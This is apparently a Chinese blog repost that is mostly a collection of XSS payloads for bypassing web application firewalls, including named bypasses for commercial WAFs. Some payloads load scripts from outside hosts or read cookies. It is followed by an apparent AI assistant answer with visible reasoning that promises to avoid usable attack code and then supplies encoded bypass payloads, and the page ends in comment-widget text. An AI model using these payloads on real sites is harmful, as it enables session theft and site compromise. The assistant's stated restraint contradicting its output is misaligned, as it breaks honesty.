XSS 绕过waf 姿势

https://www.cnblogs.com/wintrysec/p/10874980.html

 

 

1.使用无害的payload,类似<b>,<i>,<u>

观察响应,判断应用程序是否被HTML编码,是否标签被过滤,是否过滤<>等等;

2.如果过滤闭合标签,尝试无闭合标签的payload(<b,<i,<marquee)观察响应;

3.尝试以下payload

 

<script>prompt(1)</script> <script>confirm(1)</script> <script src="https://xss.haozi.me/j.js"><script>

判断是否触发过滤规则,尝试使用大小写混合字符

 

<scRiPt>alert(1)</scrIPt>

1.如果大小写不行的话,<script>被过滤尝试<scr<script>ipt>alert(1)</scr<script>ipt>

2.使用<a>标签测试

 

<a href="https://xss.haozi.me/j.js">clickme</a>

2|0测试其它标签

 

src属性

 

<img src=x οnerrοr=prompt(1);> <img/src=aaa.jpg οnerrοr=prompt(1);> <video src=x οnerrοr=prompt(1);> <audio src=x οnerrοr=prompt(1);>

iframe

 

<iframesrc="javascript:alert(2)"><iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

Embed

 

<embed/src=//goo.gl/nlX0P>

Action

 

<form action="Javascript:alert(1)"> <input type=submit action="javascript:alert(1)"/> <isindex type=image action="javascript:alert(1)"> <isindex type=image action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1)> /*html编码*/ <isindex action=data:text/html, type=image>

mario验证

 

<formaction=&#039;data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt&#039;><button>CLICK

formaction属性

 

<isindex formaction="javascript:alert(1)" type=image> <input type="image" formaction=JaVaScript:alert(0)> <form><button formaction=javascript&colon;alert(1)>CLICKME

“background”属性

 

<table background=javascript:alert(1)></table> // Works on Opera 10.5     and IE6

“posters” 属性

 

<video poster=javascript:alert(1)//></video> // Works Upto Opera 10.5

“data”属性

 

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">

“code”属性

 

<applet code="javascript:confirm(document.cookie);"> // Firefox Only <embed  code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>

事件处理

 

<svg/οnlοad=prompt(1);> <marquee/onstart=confirm(2)> <body οnlοad=prompt(1);> <select autofocus οnfοcus=alert(1)> <textarea autofocus οnfοcus=alert(1)> <keygen autofocus οnfοcus=alert(1)> <video><source οnerrοr="javascript:alert(1)">

短payload

 

<q/oncut=open()> <q/oncut=alert(1)> //在有效负载限制的情况下非常有用

嵌套欺骗

 

<marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)>

圆括号被过滤

 

<a οnmοuseοver="javascript:window.οnerrοr=alert;throw 1> <img src=x οnerrοr="javascript:window.οnerrοr=alert;throw 1"> <body/οnlοad=javascript:window.οnerrοr=eval;throw&#039;=alert\x281\x29&#039;;

“location”属性

 

<a οnmοuseοver=location=’javascript:alert(1)>click <body οnfοcus="location=&#039;javascrpt:alert(1)>123

其他Payload

 

<meta http-equiv="refresh" content="0;url=//goo.gl/nlX0P"> <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> <svg xmlns="http://www.w3.org/2000/svg"><g οnlοad="javascript:\u0061lert(1);"></g></svg> <svg xmlns:xlink=" r=100 /><animate attributeName="xlink:href"     values=";javascript:alert(1)" begin="0s"     dur="0.1s" fill="freeze"/> <svg><![CDATA[><imagexlink:href="]]><img/src=xx:xοnerrοr=alert(2)//"</svg> <meta content="&NewLine; 1 &NewLine;;JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/><math><a xlink:href="//jsfiddle.net/t846h/">click

();:被过滤

 

<svg><script>alert&#40/1/&#41</script>     // Works With All Browsers     ( is html encoded to &#40 ) is html encoded to &#41

3|0基于上下文的过滤

 

WAF最大的问题是不能理解内容,使用黑名单可以阻挡独立的js脚本

但仍不能对xss提供足够的保护,如果一个反射型的XSS是下面这种形式

输入反射属性

 

<input value="XSStest" type=text>

我们可以使用 “><img src=x onerror=prompt(1);>触发

但是如果<>被过滤,我们仍然可以使用“ autofocus onfocus=alert(1)//触发

基本是使用“ 关闭value属性,再加入我们的执行脚本

 

" οnmοuseοver="prompt(0) x=" " οnfοcusin=alert(1) autofocus x=" " οnfοcusοut=alert(1) autofocus x=" " οnblur=alert(1) autofocus a="

输入反射在<script>标签内

类似这种情况:

 

<script>Var x=”Input”;</script>

通常,我们使用“></script>,闭合前面的</script>标签

然而在这种情况,我们也可以直接输入执行脚本 alert(), prompt(),confirm()

例如:“; alert(1)//

非常规事件监听

DOMfocusin,DOMfocusout,等事件,这些需要特定的事件监听适当的执行。例如:

 

";document.body.addEventListener("DOMActivate",alert(1))// ";document.body.addEventListener("DOMActivate",prompt(1))// ";document.body.addEventListener("DOMActivate",confirm(1))//

此类事件的列表

 

DOMAttrModified DOMCharacterDataModified DOMFocusIn DOMFocusOut DOMMouseScroll DOMNodeInserted DOMNodeInsertedIntoDocument DOMNodeRemoved DOMNodeRemovedFromDocument DOMSubtreeModified

超文本内容

代码中的情况如下

 

<a href=”Userinput”>Click</a>

可以使用javascript:alert(1)//直接执行<a href="javascript:alert(1)//">Click</a>

变形

主要包含大小写和JavaScript变形

 

  javascript&#058;alert(1)   javaSCRIPT&colon;alert(1)   JaVaScRipT:alert(1)   javas&Tab;cript:\u0061lert(1);   javascript:\u0061lert&#x28;1&#x29   javascript&#x3A;alert&lpar;document&period;cookie&rpar;

JSON内容

反射输入

 

  encodeURIComponent(&#039;userinput&#039;)

可以使用

 

  -alert(1)-   -prompt(1)-   -confirm(1)-

结果

 

  encodeURIComponent(&#039;&#039;-alert(1)-&#039;&#039;)   encodeURIComponent(&#039;&#039;-prompt(1)-&#039;&#039;)

输入反射在svg标签内

源码如下:

 

<svg><script>var myvar=”YourInput”;</script></svg>

可以输入

 

www.site.com/test.php?var=text”;alert(1)//

如果系统编码了”字符

 

<svg><script>var myvar="text&quot;;alert(1)//";</script></svg>

原因是引入了附加的(XML)到HTML内容里,可以使用2次编码处理

字符集BUG

字符集BUG在IE中很普遍,最早的bug是UTF-7。如果能控制字符集编码,我们可以绕过99% 的WAF过滤。

示例

 

http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=XSS

可以控制编码,提交

 

http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=”><img src=x οnerrοr=prompt(0);>

可以修改为UTF-32编码形式

 

∀㸀㰀script㸀alert(1)㰀/script㸀 http://xsst.sinaapp.com/utf-32-1.php?charset=utf-32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80

空字节

最常用来绕过mod_security防火墙,形式如下:

 

<scri%00pt>alert(1);</scri%00pt> <scri\x00pt>alert(1);</scri%00pt> <s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>

空字节只适用于PHP 5.3.8以上的版本

Unicode分隔符

[on\w+\s*]这个规则过滤了所有on事件

为了验证每个浏览器中有效的分隔符,可以使用fuzzing方法测试0×00到0xff,

结果如下:

 

  IExplorer=     [0x09,0x0B,0x0C,0x20,0x3B]   Chrome =     [0x09,0x20,0x28,0x2C,0x3B]   Safari = [0x2C,0x3B]   FireFox=     [0x09,0x20,0x28,0x2C,0x3B]   Opera = [0x09,0x20,0x2C,0x3B]   Android =     [0x09,0x20,0x28,0x2C,0x3B] ​ x0b在Mod_security中已经被过滤,绕过的方法: <a/onmouseover[\x0b]=location=&#039;\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B&#039;>rhainfosec

缺少X-frame选项

通常会认为X-frame是用来防护点击劫持的配置,其实也可以防护使用iframe引用的xss漏洞

DOM型XSS

服务器不支持过滤DOM型的XSS,因为DOM型XSS总是在客户端执行,看一个例子:

 

<script> vari=location.hash; document.write(i); </script>

在一些情况下,反射型XSS可以转换成DOM型XSS:

 

http://www.target.com/xss.php?foo=<svg/οnlοad=location=/java/.source+/script/.source+location.hash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.hash[3]//#:()

上面的POC只在[.+都被允许的情况下适用,可以使用location.hash注入任何不允许的编码

 

Location.hash[1] = : //定义在散列后的第一个位置 Location.hash[2]= ( //定义在哈希之后的第二个位置 Location.hash[3] = )   //定义在散列之后的第三个位置

如果有客户端过滤可能不适用

绕过

ModSecurity绕过

 

<scri%00pt>confirm(0);</scri%00pt><a/onmouseover[\x0b]=location=&#039;\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B&#039;>rhainfosec

WEB KNIGHT绕过

 

<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image><marquee/onstart=confirm(2)>

F5 BIG IP ASM and Palo ALTO绕过

 

<table background="javascript:alert(1)"></table> //IE6或者低版本Opera “/><marquee  onfinish=confirm(123)>a</marquee>

Dot Defender绕过

 

<svg/οnlοad=prompt(1);><isindex action="javas&tab;cript:alert(1)" type=image><marquee/onstart=confirm(2)>

 

__EOF__

<think>好的,用户想了解如何通过XSS漏洞绕过WAF防护机制。首先,我需要回忆一下相关的知识,确保信息准确。根据提供的引用内容,绕过WAF的方法主要有提交方式绕过、混淆伪装、编码转换、利用协议特性等。 用户可能对WAF的工作原理不太清楚,可能需要简单解释一下WAF如何检测恶意输入,比如基于正则表达式或规则库。然后,分点说明不同的绕过技术,每个方法都需要具体的例子,比如在提交方式绕过中,提到GET和POST的区别,或者如何在Cookie中注入。 要注意避免提供可用于实际攻击的详细代码,保持讨论在理论层面。同时,强调这些方法仅用于学习,并提醒遵守法律。可能需要检查引用内容中的例子是否正确,例如混淆伪装的例子是否有误,比如使用<img/src=1 onerror=alert(1)>这样的变体来绕过过滤。 另外,引用中的资料提到的一些方法,比如大小写混淆、标签属性分割,这些都需要具体说明。同时,注意不同WAF可能有不同的规则,所以绕过方法可能因情况而异。 最后,用户可能需要防御建议,所以需要补充如何防范这些绕过手段,比如输入验证、输出编码、CSP等。确保回答结构清晰,分点列出绕过方法和防御措施,并正确引用来源。</think>### 如何绕过WAF实现XSS攻击? #### 一、WAF的检测机制与绕过原理 WAF通常通过正则表达式匹配、关键字过滤或行为分析来拦截XSS攻击载荷。绕过核心在于**混淆恶意代码**或**利用检测逻辑漏洞**,例如: 1. **语法拆分**:如`<scr<script>ipt>`可绕过简单关键字过滤[^3] 2. **编码转换**:使用HTML实体编码、Unicode转义等,如`< → \u003c` 3. **协议混淆**:利用JavaScript伪协议`javascript:alert(1)`的变体 #### 二、具体绕过方法 1. **提交方式绕过** - 将恶意载荷从GET请求改为POST请求或HTTP头部(如Referer) - 示例:通过修改Cookie值注入`Cookie: name=<script>alert(1)</script>`[^1] 2. **标签属性混淆** ```html <img/src="x"onerror=alert(1)> <!-- 省略空格和引号 --> <svg/onload=alert`1`> <!-- 使用反引号 --> ``` 3. **编码嵌套技术** ```javascript // 多重URL编码 %253Cscript%253Ealert(1)%253C/script%253E // Base64解码注入 <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> ``` 4. **利用JavaScript语法特性** ```javascript // 字符串拼接 window['al'+'ert'](1) // Unicode编码 \u0061\u006c\u0065\u0072\u0074(1) ``` 5. **WAF规则库盲区利用** - 使用冷门HTML标签:`<details open ontoggle=alert(1)>` - 新浏览器API:`<audio src=1 onratechange=eval(`alert(1)`)>`[^2] #### 三、防御建议 1. **输入验证**:白名单校验数据类型(如仅允许数字) 2. **输出编码**:根据上下文使用HTML/URL/JavaScript编码 3. **CSP策略**:通过`Content-Security-Policy`限制脚本来源 4. **WAF规则优化**:使用语义分析而非单纯正则匹配
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值